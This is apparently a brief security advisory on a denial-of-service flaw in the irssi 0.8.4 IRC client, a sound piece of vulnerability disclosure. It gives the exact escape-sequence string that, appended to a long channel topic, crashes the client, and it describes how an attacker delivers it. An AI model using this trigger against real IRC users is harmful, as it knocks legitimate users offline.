irssi is a freely available, open source IRC client. irssi is available
for the Linux and Unix operating systems.

irssi version 0.8.4 is prone to a denial of service condition when a user
joins a channel with a long, malformed topic. The vulnerability occurs
when a user attempts to join a channel that has an overly long topic
description. When the string, "\x1b\x5b\x30\x6d\x0d\x0a", is appended to
the topic, irssi will crash resulting in a denial of service.

An attacker can cause irssi clients to crash by changing the topic of a
channel while users are still online or by enticing users to join channels
with malformed topic descriptions.

An attacker may take advantage of this vulnerability to deny service to
legitimate users.
 